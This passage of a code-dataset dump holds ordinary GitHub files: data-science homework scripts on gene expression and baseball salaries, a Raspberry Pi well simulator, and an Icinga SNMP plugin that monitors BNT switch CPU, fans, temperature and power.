"text": "'''\nCreated on Jun 1, 2016\n\n@author: xieqihui\n'''\nimport numpy as np\nimport pandas as pd # pandas\nimport matplotlib.pyplot as plt # module for plotting \nimport datetime as dt # module for manipulating dates and times\nimport numpy.linalg as lin # module for performing linear algebra operations\nimport re\nfrom scipy.constants.constants import year\n\nexprs = pd.read_csv(\"../Data/exprs_GSE5859.csv\")\nsampleinfo = pd.read_csv(\"../Data/sampleinfo_GSE5859.csv\")\nexprs.index = exprs[exprs.columns[0]]\nexprs.drop(exprs.columns[0], axis=1, inplace=True)\n###Reorder the columns to be the same as the order of the filename in sampleinfo\ndigi_in_column = np.array([re.findall(r'\\d+', s) for s in exprs.columns])[:,0].astype(int)\ndigi_in_column.sort()\nnew_column = [\"GSM\"+str(digi)+\".CEL.gz\" for digi in digi_in_column]\nexprs = exprs[new_column]\n#print (exprs.columns == sampleinfo.filename).all()\n\n\n\n### Problem1(c) create elapsedInDays\nsampleinfo.date = pd.to_datetime(sampleinfo.date)\nyr = [d.year for d in sampleinfo.date]\nmon = [d.month for d in sampleinfo.date]\nsampleinfo['year'] = yr\nsampleinfo['month'] = mon\nsampleinfo['elapsedInDays'] = [d.days for d in (sampleinfo.date - pd.Timestamp('2002-10-31'))]\n\n###Problem 1(d) \nsampleinfoCEU = sampleinfo[sampleinfo.ethnicity == 'CEU']\n#print sampleinfoCEU.tail()\nexprsCEU = exprs[sampleinfoCEU.filename]\n\n#print (exprsCEU.columns == sampleinfoCEU.filename).all()\nexprsCEU['average'] = exprsCEU.mean(axis=1)\nfor col in exprsCEU.columns[0:-1]:\n exprsCEU.loc[:,col] = exprsCEU[col] - exprsCEU[\"average\"]\n#print exprsCEU.head()\n\nsample = np.array(exprsCEU.iloc[:,:-1]).transpose()\nsigma = 1/float(sample.shape[1])* np.dot(sample.transpose(), sample)\nU, s, V = lin.svd(sigma)\nPC1 = np.dot(sample, U[:,0])\nfig1, (ax1, ax2) = plt.subplots(nrows= 2, ncols=1)\nax1.hist(PC1, bins = 25)\nax2.scatter(sampleinfoCEU.elapsedInDays, PC1)\nplt.show()\n\n\n\n"
},
{
"alpha_fraction": 0.6241135001182556,
"alphanum_fraction": 0.6395494341850281,
"avg_line_length": 34.235294342041016,
"blob_id": "4b5057cfa7bb306f5d970d6c73570492a9710dfe",
"content_id": "d05cfde99d4437c38d9a73c66e8e1b12555d8d7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2397,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 68,
"path": "/src/P1.py",
"repo_name": "xieqihui/CS109",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import ticker\nfrom scipy import stats\nimport requests\nimport zipfile\nimport StringIO\n\n###Download zip file and extract csv from the file\n'''\nr = requests.get(\"http://seanlahman.com/files/database/lahman-csv_2014-02-14.zip\")\nzf = zipfile.ZipFile(StringIO.StringIO(r.content))\nsalary = pd.read_csv(zf.open(\"Salaries.csv\"))\nteam = pd.read_csv(zf.open(\"Teams.csv\"))\n'''\n### Load data from local files\nsalary = pd.read_csv(\"Data/Salaries.csv\")\nteam = pd.read_csv(\"Data/Teams.csv\")\n\n#print salary.head()\n#print team.head()\n\nsalary_sum = pd.DataFrame(salary.groupby([\"teamID\",\"yearID\"])[\"salary\"].apply(np.sum))\nsalary_sum.reset_index(inplace=True)\n#print salary_sum.head()\n\nsalary_win = pd.merge(left=salary_sum, right=team, how='inner', \\\n on=['teamID', 'yearID'])\n\n###Plot the relationship between total salary and total win over each year.\n#salary_win.sort_values(by='salary', inplace=True)\nyears = salary_win['yearID'].unique()\nteams = salary_win['teamID'].unique()\n#print teams\nyears.sort()\nresidual = np.ndarray((len(years),len(teams)))\nfig = plt.figure(figsize=(22,15))\nfor (ind, yr) in enumerate(years):\n df = salary_win[salary_win['yearID'] == yr]\n slope, intercept, r_value, p_value, std_err = stats.linregress(df['salary'], df['W'])\n ax = fig.add_subplot(5, 6, ind+1)\n plt.title(\"%d\" % yr)\n ax.scatter(df['salary'], df['W'])\n ax.plot(df['salary'],intercept + slope * df['salary'])\n ax.set_xlabel(\"Total salary\", fontsize=6)\n ax.set_ylabel(\"Win\", fontsize=6)\n ax.set_ylim([40,120])\n plt.annotate(s=\"OAK\", \\\n xy=(df['salary'][df['teamID']=='OAK'], df['W'][df['teamID']=='OAK']), \\\n xytext=(-20, 20),textcoords = 'offset points', ha = 'right', va = 'bottom', \\\n bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.5), \\\n arrowprops = dict(arrowstyle = '->', connectionstyle = 'arc3,rad=0'))\n\n for (i,t) in enumerate(teams):\n if t in df['teamID'].unique():\n residual[ind,i] = df['W'][df['teamID']==t] - (intercept + slope * df['salary'][df['teamID']==t])\n\n\nteam_res = pd.DataFrame(residual, columns= teams)\nfig2 = plt.figure()\nax = fig2.add_subplot(111)\nax.plot(years, team_res)\nax.set_xlabel(\"Year\")\nax.set_ylabel(\"Residual\")\n\nfig.tight_layout()\nplt.show()\n\n"
}
] | 6 |
Petrolog/RaspberryPIWellSimulator | https://github.com/Petrolog/RaspberryPIWellSimulator | 46626ad5965eb87470e3c5e2d9bece5d62242f3a | 10371ab07598702e73a53f1bd2779389e1a33184 | 74e384681752a9c73a1ce0e3241038302d89a35e | refs/heads/master | 2016-06-07T17:30:20.861569 | 2016-04-13T00:58:28 | 2016-04-13T00:58:28 | 14,973,000 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4762752056121826,
"alphanum_fraction": 0.49822065234184265,
"avg_line_length": 23.100000381469727,
"blob_id": "882acf3c395041b549412dff67de187a48fec05e",
"content_id": "f7252c1d81bcaaa3fecaa66dd2faa7d058f64847",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1686,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 70,
"path": "/Utils/G4Test.py",
"repo_name": "Petrolog/RaspberryPIWellSimulator",
"src_encoding": "UTF-8",
"text": "__author__ = 'Cesar'\n\n#-------------------------------------------------------------------------------\n# Name: G4Test\n# Purpose:\n#\n# Author: Cesar\n#\n# Created: 07/08/2013\n# Copyright: (c) Cesar 2013\n# Licence: <your licence>\n#-------------------------------------------------------------------------------\n\nimport time\nimport serial\nimport threading\n\nmessageToSend = 'E'\ntenSec = 0\nRx = True\nerrorCounter = 0\n\ndef SendCommand():\n global tenSec, Rx, messageToSend, errorCounter\n\n print(\"TxST: SendCommand Thread Running ...\")\n port.flushOutput()\n\n\n while True:\n if messageToSend == 'E':\n command = \"01E\\x0D\"\n Rx = True\n elif messageToSend == 'MB':\n command = \"01MB\\x0D\"\n Rx = True\n elif messageToSend == 'S?1':\n command = \"01S?1\\x0D\"\n Rx = True\n\n data_toPrint = command[:-1]\n print(\"[{}]TxST: Tx Data->[{}]\".format(time.clock(), data_toPrint))\n port.write(command)\n while Rx:\n try:\n MessageFromSerial = port.readline()\n # Remove last 3 chars (CR LF)\n data_toPrint = MessageFromSerial[:-2]\n print(\"[{}]RxST: Rx Data->[{}]\".format(time.clock(), data_toPrint))\n Rx = False\n\n except serial.SerialException as e:\n print(\"Error: ...\"+e)\n\n except IndexError as i:\n print(\"Error: ...\"+i)\n\n\n\n\nglobal port\n\nport = serial.Serial(\"/dev/ttyAMA0\", baudrate=19200, timeout=1)\n\nSerialRxThread = threading.Thread(target=SendCommand)\nSerialRxThread.daemon = True\nSerialRxThread.start()\n\nwhile True:\n a=0 #Do nothing"
},
{
"alpha_fraction": 0.5372119545936584,
"alphanum_fraction": 0.5508122444152832,
"avg_line_length": 27.17021369934082,
"blob_id": "d20d8b205cb8dc9db837c071f442fd8532206c5e",
"content_id": "e2e82306fb378f44ce5d22ea46a503681841119c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2647,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 94,
"path": "/simulator.py",
"repo_name": "Petrolog/RaspberryPIWellSimulator",
"src_encoding": "UTF-8",
"text": "__author__ = 'Cesar'\n\n\nimport readDyna\nimport time\nimport logging\nimport threading\nimport piplates.DAQCplate as io\n\n\ndef generate_load_and_position():\n \"\"\"\n Gets data from readyDyna and generates a (load, position) pair every 80ms\n \"\"\"\n logging.info(\"generate_load_and_position: Thread Running ...\")\n while True:\n for point in readDyna.dyna:\n if running:\n time.sleep(.1)\n load = float(point[0])/1000\n position = float(point[1])/1000\n logging.debug(\"generate_load_and_position: load(V) = [{0}], position = [{1}]\"\n .format(load, position))\n io.setDAC(0, 0, load)\n io.setDAC(0, 1, position)\n else:\n logging.debug(\"generate_load_and_position: Stopped\")\n break\n\n\ndef blink_leds():\n \"\"\"\n Blink a pattern in DAQC LEDs to show work is being done\n \"\"\"\n logging.info(\"blink_leds: Thread Running ...\")\n count = 1\n direction = 'up'\n while True:\n time.sleep(.1)\n if running:\n logging.debug(\"blink_leds: count = [{0}], direction = [{1}]\".format(count, direction))\n io.setDOUTall(0, count)\n if count <= 1:\n direction = 'up'\n elif count >= 255:\n direction = 'down'\n if direction == 'up':\n logging.debug(\"going UP\")\n count <<= 1\n elif direction == 'down':\n logging.debug(\"going DOWN\")\n count >>= 1\n else:\n io.setDOUTall(0, count)\n logging.debug(\"blink_leds: Stopped\")\n\n\ndef get_well_state():\n \"\"\"\n Get the status of the output connected to the run POC terminal\n \"\"\"\n global running\n logging.info(\"get_well_state: Thread Running ...\")\n while True:\n time.sleep(.5)\n well_on = io.getDINbit(0, 0)\n if well_on == 0:\n running = True\n logging.debug(\"get_well_state: Well State = Running\")\n else:\n running = False\n logging.debug(\"get_well_state: Well State = Stopped\")\n\n# Logging\nlogging.basicConfig(format='%(asctime)s - [%(levelname)s]: %(message)s',\n filename='/home/logs/simulator.log',\n level=logging.INFO)\n\nrunning = False\n\ngenerate = threading.Thread(target=generate_load_and_position)\ngenerate.daemon = True\ngenerate.start()\n\nblink = threading.Thread(target=blink_leds)\nblink.daemon = True\nblink.start()\n\nstate = threading.Thread(target=get_well_state)\nstate.daemon = True\nstate.start()\n\nwhile True:\n a = 0 # Do nothing"
}
] | 2 |
linhc130/icinga-plugins-check-bnt-switch | https://github.com/linhc130/icinga-plugins-check-bnt-switch | 57f2bc76e22052e729d8cfe051cec4d7ad16c171 | 9a4c09280d22c6730850a19e0cf2d6a80fc1dfe3 | 15661a612e22b1fdad9fb8e209757ad7bbd6e4ef | refs/heads/master | 2021-01-12T13:06:27.505739 | 2016-10-07T09:47:55 | 2016-10-07T09:47:55 | 70,116,442 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7114882469177246,
"alphanum_fraction": 0.7637075781822205,
"avg_line_length": 27.370370864868164,
"blob_id": "2d38a782fcb863a2cf5f061887990314aa050b8f",
"content_id": "82a8eddc4431b40be535ddd1d29312c6bdc190be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 766,
"license_type": "no_license",
"max_line_length": 250,
"num_lines": 27,
"path": "/README.md",
"repo_name": "linhc130/icinga-plugins-check-bnt-switch",
"src_encoding": "UTF-8",
"text": "# icinga-plugins-check-bnt-switch\n\nThis plugin checks (IBM, Lenovo) BNT G8052 G8264 switches, including\n\n- CPU with warning and critical value\n- Fans (RPM)\n- Temperature\n- Power supply status\n- Global Health (G8264)\n- SNMP\n\n\n\nWorked with icinga 1.8.\n\nShould be work with icinga 1.x / nagios\n\n\n**IMPORTANT**: \n## Requirements : python 3.x\n\nAttentions for install python 3.x on CentOS 6. Please do google how-to install python 3 on CentOS 6 and install python 3.x on separate dir other than OS default python dir to ensure 'yum' and other system scripts which based on python 2.6.x scripts.\n\n\nReference from [G8052/G8264 monitoring plugin](https://exchange.nagios.org/directory/Plugins/Hardware/Network-Gear/Others/G8052-2FG8264-monitoring-plugin/details)\n\nby Stephen HC Lin\n"
},
{
"alpha_fraction": 0.5198525190353394,
"alphanum_fraction": 0.590076744556427,
"avg_line_length": 35.05010986328125,
"blob_id": "eab5b3ef0cdd5e4ff4dfbffcc51d1e7fb00fc7ad",
"content_id": "920ef2ec22c77bb854dc3a83062c2a707aa6123b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16547,
"license_type": "no_license",
"max_line_length": 298,
"num_lines": 459,
"path": "/check_bnt_switch",
"repo_name": "linhc130/icinga-plugins-check-bnt-switch",
"src_encoding": "UTF-8",
"text": "#!/usr/local/bin/python3.4\n# Copyright (c) 2015, 2016 IBM Corp.\n#\n# This module is free software; you can redistribute\n# it and/or modify it under the terms of GNU General Public\n# License (GPL) version 2.\n# Reference : https://exchange.nagios.org/directory/Plugins/Hardware/Network-Gear/Others/G8052-2FG8264-monitoring-plugin/details\n#\n# Fixed Bug 1 : CPU warning with int to str\n# Fixed Bug 2 : Modified fan_rpm to accept o RPM which indicates not install\n# Rewrite 1 : Temperature\n# Rewrite 2 : Fan\n# Remove 1 : G8052 Global_health due to inaccuracy of non-installed fans\n#\n# Modified by Stephen HC Lin\n\nimport logging\nimport argparse\nimport subprocess\nimport re\n\nCHECK_SNMP_CMD=\"/usr/local/icinga/libexec/check_snmp \"\n# Orignal\nTEMPERATURE_OID1=\".1.3.6.1.4.1.26543.100.100.14.11.0\"\nTEMPERATURE_OID2=\".1.3.6.1.4.1.26543.100.100.14.12.0\"\nTEMPERATURE_OID3=\".1.3.6.1.4.1.26543.100.100.14.13.0\"\nTEMPERATURE_OID4=\".1.3.6.1.4.1.26543.100.100.14.32.0\"\n\nFAN_OID1=\".1.3.6.1.4.1.26543.100.100.14.14.0\"\nFAN_OID2=\".1.3.6.1.4.1.26543.100.100.14.15.0\"\nFAN_OID3=\".1.3.6.1.4.1.26543.100.100.14.16.0\"\nFAN_OID4=\".1.3.6.1.4.1.26543.100.100.14.17.0\"\nFAN_OID5=\".1.3.6.1.4.1.26543.100.100.14.18.0\"\nFAN_OID6=\".1.3.6.1.4.1.26543.100.100.14.27.0\"\nFAN_OID7=\".1.3.6.1.4.1.26543.100.100.14.40.0\"\nFAN_OID8=\".1.3.6.1.4.1.26543.100.100.14.41.0\"\n\n# Temperature OID\n# 8264 - 5 Sensors; Warning at 75 C and Recover at 90 C\n# 8052 - 11 Sensors\n#TEMPERATURE_OID=\".1.3.6.1.4.1.26543.2.7.7.1.3.1.14.0\"\nG8052_TEMPERATURE_OID=\".1.3.6.1.4.1.26543.2.7.7.1.3.1.14.0\"\nG8264_TEMPERATURE_OID=\".1.3.6.1.4.1.26543.2.7.6.1.3.1.14.0\"\n\n# FAN OID\n# 8264 - 8 Fans; But Fan 1 and 2 are 0 RPM due to non installed.\n# 8052 - 8 Fans\n#FAN_OID=\".1.3.6.1.4.1.26543.2.7.7.1.3.1.13.0\"\nG8052_FAN_OID=\".1.3.6.1.4.1.26543.2.7.7.1.3.1.13.0\"\nG8264_FAN_OID=\".1.3.6.1.4.1.26543.2.7.6.1.3.1.13.0\"\n\nPOWER_OID1=\".1.3.6.1.4.1.26543.100.100.14.20.0\"\nPOWER_OID2=\".1.3.6.1.4.1.26543.100.100.14.21.0\"\nSYS_OID=\".1.3.6.1.2.1.1.3.0\"\nG8264_CPU_64_SEC_OID=\".1.3.6.1.4.1.26543.2.7.6.1.2.2.3.0\"\nG8052_CPU_64_SEC_OID=\".1.3.6.1.4.1.26543.2.7.7.1.2.2.3.0\"\nG8264_GLOBAL_HEALTH_OID=\".1.3.6.1.4.1.26543.2.7.6.1.3.1.15.0\"\nG8052_GLOBAL_HEALTH_OID=\".1.3.6.1.4.1.26543.2.7.7.1.3.1.15.0\"\n\nG8052_MODEL=\"G8052\"\nG8264_MODEL=\"G8264\"\n\ndef find_model_of_device(ip_address):\n \"\"\"\n Find the Model of the IBM switch so that corresponding OIDs can be sent for query\n \"\"\"\n _METHOD_ =\"check_bnt_switch.find_model_of_device\"\n\n #Try to use snmpget to determine device\n output = subprocess.check_output([\"snmpget\",\"-v2c\",\"-c\",community,address,\"sysDescr.0\"],stderr=subprocess.DEVNULL)\n output = output.decode()\n if G8052_MODEL in output:\n return G8052_MODEL\n elif G8264_MODEL in output:\n return G8264_MODEL\n else:\n return \"Unknown: Unsupported Model\"\n\ndef check_snmp_status():\n \"\"\"\n Checking the snmp status of the switch\n \"\"\"\n _METHOD_ =\"check_bnt_switch.check_snmp_status\"\n\n cmd = CHECK_SNMP_CMD + \"-H \" + address + \" -C \" + community + \" -o \" + SYS_OID\n output = subprocess.getoutput(cmd)\n\n if (\"SNMP OK\" in output):\n rc = 0\n msg = \"OK: SNMP Status is OK\"\n else:\n rc = 2\n msg = \"Warning: SNMP Status is down\"\n\n return (rc, msg)\n\ndef check_cpu_status(warning, critical):\n \"\"\"\n Checking the cpu status of the switch\n \"\"\"\n _METHOD_ =\"check_bnt_switch.check_cpu_status\"\n\n if (model == G8052_MODEL):\n cpu_oid = G8052_CPU_64_SEC_OID\n elif (model == G8264_MODEL):\n cpu_oid = G8264_CPU_64_SEC_OID\n else:\n msg = \"Unknown: CPU Utilization is unknown - Unsupported Model\"\n rc = 3\n return (rc, msg)\n\n cmd = CHECK_SNMP_CMD + \"-H \" + address + \" -C \" + community + \" -o \" + cpu_oid\n output = subprocess.getoutput(cmd)\n value = output.split()[3].strip('\"')\n\n cpu_util=float(value)\n\n # OK:\n # -All Power modules are on\n # Critical:\n # -One or more Power modules are off or absent\n\n if (cpu_util > critical) :\n msg = \"Critical: High CPU utilization over \" + str(critical) +\"%\"\n rc = 2\n elif (cpu_util > warning):\n msg = \"Warning: CPU utiliziation over \" + str(warning) + \"%\"\n rc = 1\n elif (cpu_util <= warning):\n msg = \"OK: CPU utilization is ok\"\n rc = 0\n else:\n msg = \"Unknown: CPU utilization unknown\"\n rc = 3\n\n return (rc, msg)\n\ndef check_fan_status():\n \"\"\"\n Checking the fan status of the switch\n \"\"\"\n _METHOD_ =\"check_bnt_switch.check_fan_status\"\n if (model == G8052_MODEL):\n FAN_OID = G8052_FAN_OID\n elif (model == G8264_MODEL):\n FAN_OID = G8264_FAN_OID\n else:\n msg = \"Unknown: Fan status is unknown - Unsupported Model\"\n rc = 3\n return (rc, msg)\n\n try :\n cmd = CHECK_SNMP_CMD + \"-H \" + address + \" -C \" + community + \" -o \" + FAN_OID\n output = subprocess.getoutput(cmd)\n # Sample output = SNMP OK - \"Fan 1: 0 RPM (25 PWM); Fan 2: 0 RPM (25 PWM); Fan 3: 8372 RPM (25 PWM); Fan 4: 3898 RPM (25 PWM); Fan 5: 7792 RPM (25 PWM); Fan 6: 3341 RPM (25 PWM); Fan 7: 8626 RPM (25 PWM); Fan 8: 3840 RPM (25 PWM); \" |\n\n value = output.split('\"')[1].strip()\n allFans = re.findall(r'\\d+ RPM',value)\n\n fans = []\n for i in range(8):\n fans.append(int(re.sub(r' RPM','',allFans[i])))\n\n # OK:\n # -All Fans are OK\n # Critical:\n # -One or more Fans re running less than 100 RPM\n\n for fan_rpm in fans:\n if fan_rpm > 0 and fan_rpm < 100:\n msg = \"Critical: Fans status is critical \\n -One or more fans are running < 100 RPM\"+\";\"+value\n rc = 2\n return (rc, msg)\n\n msg = \"OK: Fan Status is ok\"+\";\"+value\n rc = 0\n\n except Exception as e:\n rc = 3\n msg = \"Unknown: Fan status is unknown\"\n\n return (rc, msg)\n\ndef check_power_status():\n \"\"\"\n Checking the power status of the switch\n \"\"\"\n _METHOD_ =\"check_bnt_switch.check_power_status\"\n\n cmd = CHECK_SNMP_CMD + \"-H \" + address + \" -C \" + community + \" -o \" + POWER_OID1 + \" -o \" + POWER_OID2\n output = subprocess.getoutput(cmd)\n value = output.split('-')[1].strip()\n allPowers = value.split()\n power1= int(allPowers[0].strip('\"'))\n power2= int(allPowers[1].strip('\"'))\n\n # OK:\n # -All Power modules are on\n # Critical:\n # -One or more Power modules are off or absent\n\n if (power1 == 1 and power2 == 1) :\n msg = \"OK: All Power modules are On\"\n rc = 0\n elif (power1 == 0 or power1 == 2 or power2 == 0 or power2 == 2):\n msg = \"Critical: One or more Power modules are off or absent\"\n rc = 2\n else:\n msg = \"Unknown: Power status unknown\"\n rc = 3\n\n return (rc, msg)\n\ndef check_g8052_temperature_status():\n # Rewrote by Stephen with an OID which contains all temperatures\n\n # Define Warning and Critical value by reference system output\n # Reference : SNMPv2-SMI::enterprises.26543.2.7.7.1.3.1.12.0 = STRING: \"Fans are in Back-To-Front AirFlow, Warning at 55 C and Recover at 80 C for sensor 1,2; Warning at 95 C and Recover at 120 C for sensor 6-11\n # Critical:\n # -Any of temperature sensor 1,2 is in the failure range (eg. > 80 C);\n # -Any of temperature sensors 6-11 is in the failure range (eg. > 120 C);\n # Warning:\n # -Any of temperature sensor 1,2 is in the warning threshold (eg. > 55 C);\n # -Any of temperature sensors 6-11 is in the warning threshold (eg. > 95 C);\n # OK:\n # -temperature sensor 1,2 are below the warning threshold (eg. < 55 C);\n # -temperature sensor 6-11 are below the warning threshold (eg. < 95 C);\n sysCritical=80.0\n phyCritical=120.0\n sysWarning=55.0\n phyWarning=95.0\n \n try :\n cmd = CHECK_SNMP_CMD + \"-H \" + address + \" -C \" + community + \" -o \" + G8052_TEMPERATURE_OID\n output = subprocess.getoutput(cmd)\n # Sample output = 'SNMP OK - \"Sensor 1: 28.0; Sensor 2: 31.5; Sensor 3: 30.50; Sensor 4: 48.00; Sensor 5: 47.25; Sensor 6: 56.0; Sensor 7: 52.0; Sensor 8: 63.0; Sensor 9: 49.0; Sensor 10: 49.0; Sensor 11: 56.0; \" |'\n\n value = output.split('\"')[1].strip()\n allTemps = re.findall(r'\\d+.\\d+',value)\n #allTemps = re.findall(r'[-+]?\\d*\\.\\d+|\\d+',value)\n\n temps = []\n for i in range(11):\n temps.append(float(allTemps[i]))\n #temps.append(float(re.sub(r';','',temp)))\n\n # Critical:\n # -Any of temperature sensor 1,2 is in the failure range (eg. > 80 C);\n # -Any of temperature sensors 6-11 is in the failure range (eg. > 120 C);\n # Warning:\n # -Any of temperature sensor 1,2 is in the warning threshold (eg. > 55 C);\n # -Any of temperature sensors 6-11 is in the warning threshold (eg. > 95 C);\n # OK:\n # -temperature sensor 1,2 are below the warning threshold (eg. < 55 C);\n # -temperature sensor 6-11 are below the warning threshold (eg. < 95 C);\n \n rc = 0\n msg = \"OK: Temperature status is ok;\"+value\n \n # Check Critical \n for i in range(0, 2):\n if temps[i] >= sysCritical:\n msg = \"Critical: Temparature is critical;\"+str(temps[i])+\";\"+value\n rc = 2\n return (rc, msg)\n \n for i in range(5, 11):\n if temps[i] >= phyCritical:\n msg = \"Critical: Temparature is critical;\"+str(temps[i])+\";\"+value\n rc = 2\n return (rc, msg)\n \n # Check Warning \n for i in range(0, 2):\n if temps[i] >= sysWarning:\n msg = \"Warning: Temparature status is warning;\"+str(temps[i])+\";\"+value\n rc = 1\n return (rc, msg)\n \n for i in range(5, 11):\n if temps[i] >= phyWarning:\n msg = \"Warning: Temparature status is warning;\"+str(temps[i])+\";\"+value\n rc = 1\n return (rc, msg)\n\n except Exception as e:\n rc = 3\n msg = \"Unknown: Temperature status is unknown\"\n\n return (rc, msg)\n\ndef check_g8264_temperature_status():\n # Rewrote by Stephen with an OID which contains all temperatures\n\n # Define Warning and Critical value by reference system output\n # Reference : ./check_snmp -H 172.16.164.230 -C cdltpitteam2hs4rre -o\".1.3.6.1.4.1.26543.2.7.6.1.3.1.12.0\" | P OK - Fans are in Back-To-Front AirFlow, Warning at 75 C and Recover at 90 C.1.3.6.1.4.1.26543.2.7.6.1.3.1.12.0:\"Fans are in Back-To-Front AirFlow, Warning at 75 C and Recover at 90 C\"\n # Critical:\n # -Any of temperature sensors is in the failure range (eg. > 90 C);\n # Warning:\n # -Any of temperature sensors is in the warning threshold (eg. > 75 C);\n # OK:\n # -all temperature sensors are below the warning threshold (eg. < 75 C);\n\n sysCritical=90.0\n sysWarning=75.0\n \n try :\n cmd = CHECK_SNMP_CMD + \"-H \" + address + \" -C \" + community + \" -o \" + G8264_TEMPERATURE_OID\n output = subprocess.getoutput(cmd)\n # Sample output = 'SNMP OK - \"Sensor 1: 38.0; Sensor 2: 24.0; Sensor 3: 34.5; Sensor 4: 20.5; Sensor 5: 43; \" |'\n\n value = output.split('\"')[1].strip()\n allTemps = re.findall(r'[-+]?\\d*\\.\\d+|\\d+',value)\n\n temps = []\n for temp in allTemps:\n temps.append(float(re.sub(r';','',temp)))\n\n # Critical:\n # -Any of temperature sensors is in the failure range (eg. > 90 C);\n # Warning:\n # -Any of temperature sensors is in the warning threshold (eg. > 75 C);\n # OK:\n # -all temperature sensors are below the warning threshold (eg. < 75 C);\n\n rc = 0\n msg = \"OK: Temperature status is ok;\"+value\n\n # Check Temperature Critical threshold\n for temp in temps:\n if temp >= sysCritical:\n msg = \"Critical: Temparature is critical;\"+str(temp)+\";\"+value\n rc = 2\n return (rc, msg)\n\n # Check Temperature Warning threshold\n for temp in temps:\n if temp >= sysWarning:\n msg = \"Warning: Temparature status is warning;\"+str(temp)+\";\"+value\n rc = 1\n return (rc, msg)\n\n except Exception as e:\n rc = 3\n msg = \"Unknown: Temperature status is unknown\"\n\n return (rc, msg)\n\ndef check_temperature_status():\n \"\"\"\n Checking the temperature status of the switch - Rewrote by Stephen separate check funtions of G8052 and G8264\n \"\"\"\n _METHOD_ =\"check_bnt_switch.check_temperature_status\"\n if (model == G8052_MODEL):\n (rc,msg) = check_g8052_temperature_status()\n return (rc, msg)\n elif (model == G8264_MODEL):\n (rc,msg) = check_g8264_temperature_status()\n return (rc, msg)\n else:\n msg = \"Unknown: Temperature Utilization is unknown - Unsupported Model\"\n rc = 3\n return (rc, msg)\n\ndef check_global_health():\n \"\"\"\n Checking the global status of the switch. This method uses OID - modified by Stephen\n \"\"\"\n _METHOD_ =\"check_bnt_switch.check_global_health\"\n\n if (model == G8052_MODEL):\n #global_health_oid = G8052_GLOBAL_HEALTH_OID\n # Through field tests, G8052 may report critical caused by first 2 Fans are not installed.\n msg = \"Unknown: Global Health Status is not accurate at G8052\"\n rc = 3\n return (rc, msg)\n elif (model == G8264_MODEL):\n global_health_oid = G8264_GLOBAL_HEALTH_OID\n else:\n msg = \"Unknown: Global Health Status is unknown\"\n rc = 3\n return (rc, msg)\n\n cmd = CHECK_SNMP_CMD + \"-H \" + address + \" -C \" + community + \" -o \" + global_health_oid\n output = subprocess.getoutput(cmd)\n value = output.split('=')[1].strip()\n\n # OK:\n # -All temperature sensors are below the warning threshold (eg. < 85 C);\n # -All fans are running at >=100 RPMs;\n # -Both power supplies are on;\n # -No panic dump exists in flash.\n # Warning:\n # -One or more temperature sensors is in the warning range (eg. >=85 and < 100 C);\n # -A panic dump exists in flash.\n # Critical:\n # -One or more temperature sensors is in the failure range (eg. >=100 C);\n # -One or more fans are running < 100 RPM;\n # -One power supply is off.\n\n if (value == '1'):\n msg = \"OK: Global Health Status is OK \\n -All temperature sensors are below the warning threshold \\n -All fans are running at >=100 RPMs \\n -Both power supplies are on \\n -No panic dump exists in flash\"\n rc = 0\n elif (value == '2'):\n msg = \"Warning: Global Health Status is non-critical \\nwhich means one of the following:\\n -One or more temperature sensors is in the warning range \\n -A panic dump exists in flash\"\n rc = 1\n elif (value == '3'):\n msg = \"Critical: Global Health Status is critical \\nwhich means one of the following:\\n -One or more temperature sensors is in the failure range \\n -One or more fans are running < 100 RPM \\n -One power supply is off\"\n rc = 2\n else:\n msg = \"Unknown: Global Health Status is unknown\"\n rc = 3\n\n return (rc, msg)\n\nif __name__ == '__main__':\n\n CMD = \"check_bnt_switch\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"operation\")\n parser.add_argument('-H', '--Host', required=True)\n parser.add_argument('-C', '--Community', required=True)\n parser.add_argument('-c', '--critical', required=False, type=int)\n parser.add_argument('-w', '--warning', required=False, type=int)\n args = parser.parse_args()\n operation = args.operation\n address = args.Host\n warning = args.warning\n critical = args.critical\n community = args.Community\n\n model = find_model_of_device(address)\n\n if (operation == \"CPU\"):\n if (warning == None or critical == None):\n rc = 3\n msg = \"Warning or Critical levels missing\"\n print (msg)\n exit(rc)\n\n if operation == \"GLOBAL_HEALTH\":\n (rc,msg) = check_global_health()\n elif operation == \"TEMPERATURE\":\n # Remove threshold setting - 8052 has 2 thresholds on sensors\n (rc,msg) = check_temperature_status()\n elif operation == \"FAN\":\n (rc,msg) = check_fan_status()\n elif operation == \"POWER\":\n (rc,msg) = check_power_status()\n elif operation == \"SNMP\":\n (rc,msg) = check_snmp_status()\n elif operation == \"CPU\":\n (rc,msg) = check_cpu_status(warning, critical)\n else:\n msg = \"Unknown operation: \" + operation\n rc = 3\n\n print(msg)\n exit(rc)\n"
}
] | 2 |
AdamD-967/RandMem | https://github.com/AdamD-967/RandMem | 7e31a3b9a2e1f51cb598f29fc60ff1bd8741fe00 | 4d57fb8d2886eb960124ad97cc50025f770af2d0 | 42808b250eb72393deb36d9d742b8c9fd496a1b1 | refs/heads/master | 2022-09-05T23:05:27.627338 | 2020-05-29T12:37:08 | 2020-05-29T12:37:08 | 260,928,338 | 0 | 0 | null | 2020-05-03T13:35:29 | 2020-05-25T13:07:54 | 2020-05-25T13:07:52 | Python | [
{
"alpha_fraction": 0.6214135885238647,
"alphanum_fraction": 0.6312106251716614,
"avg_line_length": 29.404254913330078,
"blob_id": "040b67367730cecb338d9e5b89bcce15733fdf6e",
"content_id": "e7f479c166143de9f7fb56ac52ae4cb894875722",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1429,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 47,
"path": "/app.py",
"repo_name": "AdamD-967/RandMem",
"src_encoding": "UTF-8",
